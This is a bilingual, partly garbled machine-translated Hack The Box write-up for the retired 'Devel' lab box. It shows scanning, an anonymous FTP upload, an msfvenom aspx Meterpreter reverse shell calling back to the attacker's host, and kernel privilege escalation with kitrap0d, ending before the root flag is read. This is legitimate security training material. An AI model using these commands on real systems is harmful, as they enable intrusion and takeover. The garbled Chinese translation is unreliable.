安卓游戲開發推箱子_保持冷靜并砍箱子-開發

安卓游戲開發推箱子

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一個在線平臺，可讓您測試滲透測試技能。它包含一些不斷更新的挑戰。其中一些模擬現實世界的場景，而另一些則更傾向于CTF的挑戰風格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允許注銷HTB機器。

Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Devel被描述為一個相對簡單的方框，它展示了與某些默認程序配置相關的安全風險。它是初學者級別的機器，可以使用公開的漏洞利用來完成。

We will use the following tools to pawn the box on a Kali Linux box

我們將使用以下工具將盒子當成Kali Linux盒子

nmap
納帕
zenmap
禪地圖
searchsploit
searchsploit
metasploit
元胞
msfvenom
毒液

第1步-掃描網絡 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

開發機器之前的第一步是進行一些掃描和偵察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

這是最重要的部分之一，因為它將決定您以后可以嘗試利用的內容。最好在該階段花費更多時間以獲取盡可能多的信息。

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我將使用Nmap (網絡映射器)，這是一個免費的開源實用程序，用于網絡發現和安全審核。它使用原始IP數據包來確定網絡上可用的主機，這些主機提供的服務，它們正在運行的操作系統，使用的數據包過濾器/防火墻的類型以及許多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用許多命令來掃描網絡。如果您想了解更多信息，可以在這里查看文檔。

I use the following command to get a basic idea of what we are scanning

我使用以下命令來了解我們正在掃描的內容

nmap -sV -O -F --version-light 10.10.10.5

-sV: Probe open ports to determine service/version info

-sV：探測打開的端口以確定服務/版本信息

-O: Enable OS detection

-O：啟用操作系統檢測

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-掃描的端口少于默認掃描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制為最可能的探測(強度2)

10.10.10.5: IP address of the Devel box

10.10.10。 5 ：開發箱的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您還可以使用Zenmap ，這是官方的Nmap Security Scanner GUI。它是一個多平臺，免費和開源的應用程序，旨在使Nmap易于初學者使用，同時為經驗豐富的Nmap用戶提供高級功能。

I use a different set of commands to perform an intensive scan

我使用一組不同的命令來執行密集掃描

nmap -A -v 10.10.10.5

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：啟用操作系統檢測，版本檢測，腳本掃描和跟蹤路由

-v: Increase verbosity level

-v：提高詳細程度

10.10.10.5: IP address of the Devel box

10.10.10.5：開發箱的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

如果發現結果有點不堪重負，則可以移至“ 端口/主機”選項卡以僅獲取打開的端口。

We can see that there are 2 open ports:

我們可以看到有2個開放端口：

Port 21. File Transfer Protocol (FTP) control (command). Here it's a Microsoft FTP

端口 21 。文件傳輸協議(FTP)控件(命令)。這是Microsoft FTP

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an IIS server

端口 80 。超文本傳輸??協議(HTTP)。這是IIS服務器

The most likely initial attack vector appears to be the FTP in this case

在這種情況下，最有可能的初始攻擊媒介似乎是FTP

第2步-易受攻擊的FTP (Step 2 - The vulnerable FTP)

We open Firefox and visit the website at http://10.10.10.5

我們打開Firefox并訪問http://10.10.10.5的網站

From the reconnaissance phase, we found 2 files under the Microsoft FTP. Let's see if we can access them from the browser.

從偵查階段開始，我們在Microsoft FTP下找到了2個文件。讓我們看看是否可以從瀏覽器訪問它們。

I can access the welcome.png image file by visiting

我可以通過訪問訪問welcome.png圖像文件

http://10.10.10.5/welcome.png

I can also access the iisstart.htm page

我也可以訪問iisstart.htm頁面

http://10.10.10.5/iisstart.htm

We now know two things:

現在，我們知道兩件事：

The FTP is used as a file directory for the web server - discovered when we accessed the files from the recon phase.
FTP用作Web服務器的文件目錄-在我們從偵察階段訪問文件時發現。

The FTP allows anonymous login - discovered when we performed the intense scan.
FTP允許匿名登錄-在我們執行密集掃描時發現。

Let's see if we can create a file and add it to the FTP

讓我們看看是否可以創建文件并將其添加到FTP

I create a file by using this command and output the result to a file called htb.html

我使用此命令創建文件，并將結果輸出到名為htb.html的文件中

echo HackTheBox > htb.html

I then check with ls if the file has been created and what is the content of the file with this command

然后，我用ls檢查該文件是否已創建以及該命令的文件內容是什么

cat htb.html

Let's now connect to the FTP to add our test file

現在，我們連接到FTP以添加我們的測試文件

To connect to the FTP, I use this command

要連接到FTP，我使用以下命令

ftp 10.10.10.5

I type anonymous as the username and just press enter for the password, as it allows anonymous login.

我輸入匿名作為用戶名，然后按Enter鍵輸入密碼，因為它允許匿名登錄。

I am now connected to the FTP.

我現在已連接到FTP。

I add the file on the FTP with this command

我使用此命令將文件添加到FTP

put htb.html

The file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.

文件已成功發送。讓我們檢查是否可以從Firefox訪問它。我訪問了該頁面，我們可以在網頁上看到輸出HackTheBox 。

http://10.10.10.5/htb.html

Now that we know we can send over files, let's craft an exploit!

現在我們知道可以發送文件了，讓我們來設計一個漏洞利用程序！

第3步-使用MSFvenom進行漏洞利用 (Step 3 - Using MSFvenom to craft an exploit)

We will use MSFvenom, which is a payload generator . You can learn more about it here

我們將使用MSFvenom，它是有效負載生成器。您可以在此處了解更多信息

But first, let's check on Metasploit Framework which payload we will need to craft our exploit.

但是首先，讓我們檢查一下Metasploit Framework制作漏洞利用程序所需的有效負載。

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

我們知道我們需要創建一個反向shell ，這是目標計算機與攻擊計算機進行通信的一種shell。攻擊機具有一個偵聽器端口，在偵聽器端口上接收連接，通過使用該連接，可以執行代碼或命令。

The reverse TCP shell should be for Windows and we will use Meterpreter.

反向TCP Shell應該用于Windows，我們將使用Meterpreter 。

From the Offensive Security website, we get this definition for Meterpreter

從“進攻性安全”網站上，我們獲得了Meterpreter的定義

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一種高級的，動態可擴展的有效負載，它使用內存中的 DLL注入暫存器，并在運行時通過網絡進行了擴展。它通過暫存器套接字進行通信，并提供全面的客戶端Ruby API。它具有命令歷史記錄，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此處閱讀有關Meterpreter的更多信息。

I launch Metasploit and search for reverse TCP payloads. I use the following command

我啟動Metasploit并搜索反向TCP有效負載。我使用以下命令

search windows/meterpreter/reverse_tcp

We find an interesting payload, number 2, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker

我們找到了一個有趣的有效負載，編號2，它是反向TCP階段程序 。該有效負載通過Reflective Dll Injection有效負載注入抄表器服務器DLL，并連接回攻擊者

payload/windows/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit. And more specifically an aspx reverse shell. This piece of information has been collected during recon phase

現在讓我們回到msfvenom來設計我們的漏洞利用程序。更具體地說是aspx反向外殼。這條信息是在偵察階段收集的

I use the following command

我使用以下命令

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

- P：有效載荷來使用

-f: Output format

- F：輸出格式

-0: Save the payload to a file

- 0：保存有效載荷到一個文件

LHOST: Local host

LHOST ：本地主機

LPORT: Local port

LPORT ：本地端口

I then check with ls if the file has been created. It's time to send it over to the FTP

然后，我用ls檢查是否已創建文件。是時候將其發送到FTP了

Let's reconnect to the FTP and send our little gift!

讓我們重新連接到FTP并發送我們的小禮物！

I connect to the FTP, enter anonymous as a username, skip the password by pressing enter. I then send the file with the following command

我連接到FTP，輸入匿名作為用戶名，然后按Enter跳過密碼。然后，我使用以下命令發送文件

put devel.aspx

Let's check if the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server with the following command

讓我們檢查文件是否已正確發送。回到Firefox ，我使用以下命令導航到FTP服務器

ftp://10.10.10.5

We can see that our little gift is here!

我們可以看到我們的小禮物在這里！

Here is the exploit, if you're curious to know what it looks like

這是漏洞利用程序，如果您想知道它是什么樣子

第4步-使用Metasploit設置偵聽器 (Step 4 - Setting up a listener with Metasploit)

Back on Metasploit where I use the following command to set the payload handler

回到Metasploit，在這里我使用以下命令設置有效負載處理程序

use exploit/multi/handler

I check to see which options are available

我檢查一下哪些選項可用

We first set up the payload

我們首先設置有效載荷

set payload windows/meterpreter/reverse_tcp

Then the LHOST

然后LHOST

set lhost 10.10.14.15

And finally the LPORT

最后是LPORT

set lport 4444

If we check the options now, we should see that everything is set up

如果我們現在檢查選項，我們應該看到一切都已設置

Let's run the exploit.

讓我們運行漏洞利用程序。

After this message appears

此消息出現后

Started reverse TCP handler on 10.10.14.15:4444

go back to the browser and access the page where the malicious script is hosted

返回瀏覽器并訪問托管惡意腳本的頁面

http://10.10.10.5/devel.aspx

You should then see a Meterpreter session created

然后，您應該看到一個Meterpreter會話已創建

Now that I have a session, I try to look for the first flag, user.txt using the following command on meterpreter

現在我已經有了一個會話，我嘗試在meterpreter上使用以下命令查找第一個標志user.txt

search -f user.txt

No files are matching my search. I try with .* to see other files, but nothing useful

沒有文件與我的搜索匹配。我嘗試使用。*查看其他文件，但沒什么用

I then create a shell with the following command

然后，使用以下命令創建外殼

shell

I use the following command to get the system information

我使用以下命令獲取系統信息

systeminfo

We can see that the registered owner is called babis. This might an important piece of information when we will be looking for the user flag. We can also see that the machine doesn't have any hotfixes.

我們可以看到注冊所有者稱為babis 。當我們要尋找用戶標志時，這可能是一條重要的信息。我們還可以看到該機器沒有任何修補程序。

I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both gave me Access denied.

我開始瀏覽文件夾。我使用dir列出所有文件/文件夾，并使用cd更改目錄。我在babis和Administrator文件夾上嘗試過運氣，但兩者均使我無法訪問。

We need to escalate privilege! Knowing that when we checked for the system information, no hotfixes were found, we can try to find exploits applicable to this machine.

我們需要提升特權！知道當我們檢查系統信息時，找不到修補程序，因此我們可以嘗試查找適用于此計算機的漏洞利用程序。

步驟5-執行特權升級 (Step 5 - Performing Privilege Escalation)

I put the session in the background with this command

我使用此命令將會話置于后臺

background

I then use the following command

然后，我使用以下命令

use post/multi/recon/local_exploit_suggester

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter

本模塊建議可以使用的本地Meterpreter利用。根據用戶打開外殼的體系結構和平臺以及Meterpreter中的可用漏洞，建議利用漏洞

I check the options and I set the session

我檢查選項并設置會話

It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options

重要的是要注意，并非所有本地漏洞都會被解雇。根據以下條件選擇漏洞利用：會話類型，平臺，體系結構和所需的默認選項

Going down the list

進入清單

exploit/windows/local/bypassuac_eventvwr

fails due to the IIS user not being a part of the administrators group, which is the default and to be expected.

由于IIS用戶不是管理員組的一部分而失敗，這是默認情況，這是預期的，因此失敗。

I use the next exploit on the list, which is

我使用列表中的下一個漏洞，即

use exploit/windows/local/ms10_015_kitrap0d

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

該模塊將通過Tavis Ormandy的KiTrap0D漏洞創建一個具有SYSTEM特權的新會話。如果正在使用的會話已經提升，則利用將無法運行。該模塊依賴kitrap0d.x86.dll，而Windows x64版本不支持該模塊。

When we ran the sysinfo in the Meterpreter session, it revealed that the target was x86 architecture

當我們在Meterpreter會話中運行sysinfo時，它表明目標是x86體系結構

I check the options and then set the session

我檢查選項，然后設置會話

I run the exploit.

我運行漏洞利用程序。

The exploit was successful, but the session couldn't be created. This is because of the first line in the exploit trying to set up a reverse handler on the default eth0 and default port, and not the VPN interface for HTB labs.

該漏洞利用成功，但無法創建會話。這是因為漏洞利用的第一行試圖在默認的eth0和默認端口(而不是HTB實驗室的VPN接口)上設置反向處理程序。

Started reverse TCP handler on 10.0.2.15:4444

I check the options and set LHOST and LPORT

我檢查選項并設置LHOST和LPORT

I then check all the sessions alive with the following command, in case my session died

然后，使用以下命令檢查所有活動會話，以防我的會話死亡

sessions -l

I can see my session

我可以看到我的會議

Now that we have a meterpreter session, let's start navigating the folder and find the flags!

現在我們有了一個抄表器會話，讓我們開始瀏覽該文件夾并找到標記！

步驟6-尋找user.txt標志 (Step 6 - Looking for the user.txt flag)

Let's first check where we are with the following command

我們首先使用以下命令檢查我們的位置

pwd

which stands for print work directory

代表打印工作目錄

I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit

我要到C：\和LS中的所有文件/文件夾。我從步驟4-使用Metasploit設置偵聽器中的上一次嘗試中已經知道要看的地方

I go back to the Users directory

我回到用戶目錄

Then move to the babis directory

然后移至babis目錄

From there, I go to the Desktop directory

從那里，我轉到桌面目錄

We found the user.txt.txt file! To read the content of the file I use the command

我們找到了user.txt.txt文件！要讀取文件的內容，請使用以下命令

cat user.txt.txt

Now that we have the user flag, let's find the root flag!

現在有了用戶標志，讓我們找到根標志！

步驟7-尋找root.txt標志 (Step 7 - Looking for the root.txt flag)

Going back to C:\ to navigate to the Administrator folder then the Desktop folder. I use ls to list all files under the Desktop folder

返回到C：\ ，導航到Administrator文件夾，然后導航到Desktop文件夾。我使用ls列出“ 桌面”文件夾下的所有文件

We find the root.txt.txt file!

我們找到了root.txt.txt文件！

To read the content of the file I use the command

要讀取文件的內容，請使用以下命令